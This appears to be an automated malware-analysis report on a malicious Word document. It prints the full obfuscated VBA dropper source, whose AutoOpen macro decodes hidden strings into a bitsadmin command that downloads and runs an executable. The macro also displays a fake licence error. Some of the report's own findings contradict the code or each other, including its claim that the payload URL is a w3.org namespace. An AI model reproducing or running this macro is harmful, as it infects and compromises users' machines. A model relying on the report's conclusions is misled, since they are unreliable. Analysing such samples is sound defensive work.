Risk Score: 192 (MALICIOUS)

Malware Insights

MITRE ATT&CK
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The sample contains VBA macros with an AutoOpen subroutine, which is a common technique for malicious documents. The document body explicitly instructs the user to 'Enable editing' and 'Enable Content', indicating a lure to bypass security measures. The VBA script attempts to execute a command via the Shell function, likely to download and run a second-stage payload. The reconstructed URL from the obfuscated VBA code is 'http://www.w3.org/1999/02/22-rdf-syntax-ns#'.
Heuristics (8)

- ClamAV: Doc.Dropper.Agent-6457794-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.Agent-6457794-0
- VBA macros detected (medium, OLE_VBA_MACROS, 2 related findings): Document contains VBA macro code
- Potential Shell call in VBA (critical, OLE_VBA_SHELL): Potential Shell call in VBA. Matched line in script: `End If Shell Jldzjklepor, vbHide MsgBox Wglwnewek`
- AutoOpen macro (low, OLE_VBA_AUTOOPEN): AutoOpen macro. Matched line in script: `Attribute VB_Name = "NewMacros" Sub AutoOpen() Jldzjklepor = Jldzjklepor & Vkjicixsoxwcend("fpg1h{h 2f %") & Vkjicixsoxwcend("zdlwiru 2w 8") & Vkjicixsoxwcend(" \NHUT ) elwvdgplq ") & Vkjicixsoxwcend("2wudqvihu XNHI 2grzqordg 2su") & Vkjicixsoxwcend("lrulw| qrupdo kw") & Vkjicixsoxwcend("wsv=22zzz1gurser{1frp")`
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Macro/content-enable lure (medium, SE_ENABLE_LURE): Document instructs the user to enable macros or editing, a common technique used by malware droppers to bypass Office macro security settings
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://www.w3.org/1999/02/22-rdf-syntax-ns# (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/ (in document text, OLE body)
  - http://purl.org/dc/elements/1.1/ (in document text, OLE body)
  - http://ns.adobe.com/photoshop/1.0/ (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/mm/ (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/sType/ResourceEvent# (in document text, OLE body)
  - http://ns.adobe.com/tiff/1.0/ (in document text, OLE body)
  - http://ns.adobe.com/exif/1.0/ (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/rights/ (in document text, OLE body)
  - http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
  - http://schemas.openxmlformats.org/officeDocument/2006/bibliography (in document text, OLE body)
  - http://schemas.openxmlformats.org/officeDocument/2006/customXml (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 2608 bytes |

SHA-256: 24500ed0607ba5c49a116f1c0d4a3f33b23b3f5b76b0ddb15e90b3c3af607079

Detection (ClamAV): No threats found

Obfuscation or payload: likely. 29 of 57 identifiers look randomly generated (e.g. 'Llkkeclduklrinoykdkcptbam'), consistent with name-mangling obfuscation.
Preview script (first 1,000 lines of the extracted script):

```vb
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "NewMacros"
Sub AutoOpen()
Jldzjklepor = Jldzjklepor & Vkjicixsoxwcend("fpg1h{h 2f %") & Vkjicixsoxwcend("zdlwiru 2w 8") & Vkjicixsoxwcend(" \NHUT ) elwvdgplq ") & Vkjicixsoxwcend("2wudqvihu XNHI 2grzqordg 2su") & Vkjicixsoxwcend("lrulw| qrupdo kw") & Vkjicixsoxwcend("wsv=22zzz1gurser{1frp")
Jldzjklepor = Jldzjklepor & Vkjicixsoxwcend("2v2os<4sw53{g:g") & Vkjicixsoxwcend(";7l25") & Vkjicixsoxwcend("de|q|e|tnxdut") & Vkjicixsoxwcend("rfd{rwr1h{hBg") & Vkjicixsoxwcend("o@4 (dssgdwd(_gs|jks1") & Vkjicixsoxwcend("h{h )") & Vkjicixsoxwcend("vwduw (dssgdwd(_gs|jk")
Jldzjklepor = Jldzjklepor & Vkjicixsoxwcend("s1h{h%")
If 59 * 4 = 12255 - 4685 Then
ghblzmzr = "bbmhy"
End If
Wglwnewek = Wglwnewek & Vkjicixsoxwcend("Huuru 4<;:7= \rx pxvw kdyh Rii") & Vkjicixsoxwcend("lfh Surihvvlrqdo Hglwlrq wr uh") & Vkjicixsoxwcend("dg wklv frqwhqw/ so") & Vkjicixsoxwcend("hdvh x") & Vkjicixsoxwcend("sjudgh |rxu olfhq") & Vkjicixsoxwcend("fh1 Ylvlw zzz") & Vkjicixsoxwcend("1plfurvriw1frp iru khos")
If Len("ovihyb") <> 167 Then
' fsvnmbgk
Else
' gmzwgfw
MsgBox "kzcknp", 282, "rkjrbpg"
End If
Shell Jldzjklepor, vbHide
MsgBox Wglwnewek
End Sub
Private Function Llkkeclduklrinoykdkcptbam(ByVal Psissennatzjccbrbmsknp As String, ByVal Bokgpt As Long) As String
If 514 * 3 = 23858 - 4050 Then
skabawcw = "xdmdktk"
End If
Dim Jhbt, Bwjhepgihtrih, Hrtkfowrgekhrkjaujtcl As Long
Jhbt = Len(Psissennatzjccbrbmsknp)
Dim Lcgjkujlju As String
Dim Egaskikszbp() As Long
ReDim Egaskikszbp(1 To Jhbt)
For Hrtkfowrgekhrkjaujtcl = 1 To Jhbt
If 654 * 8 = 24846 - 1453 Then
bwdcljj = "maclgdev"
End If
Bwjhepgihtrih = Asc(Mid(Psissennatzjccbrbmsknp, Hrtkfowrgekhrkjaujtcl, 1))
If Bwjhepgihtrih = 32 Then
Egaskikszbp(Hrtkfowrgekhrkjaujtcl) = Bwjhepgihtrih
Else:
If 335 * 3 = 26990 - 3133 Then
ffuozel = "srosep"
End If
Bwjhepgihtrih = Bwjhepgihtrih - Bokgpt
Egaskikszbp(Hrtkfowrgekhrkjaujtcl) = Bwjhepgihtrih
End If
If Len("yzykr") <> 295 Then
' abykmfx
Else
' tsyhh
MsgBox "ibkukpt", 395, "updmdgaw"
End If
Lcgjkujlju = Lcgjkujlju & Chr(Egaskikszbp(Hrtkfowrgekhrkjaujtcl))
Next
Llkkeclduklrinoykdkcptbam = Lcgjkujlju
End Function
Private Function Vkjicixsoxwcend(Oybkwjmskntyzkr As String)
Vkjicixsoxwcend = Llkkeclduklrinoykdkcptbam(Oybkwjmskntyzkr, 3)
End Function
```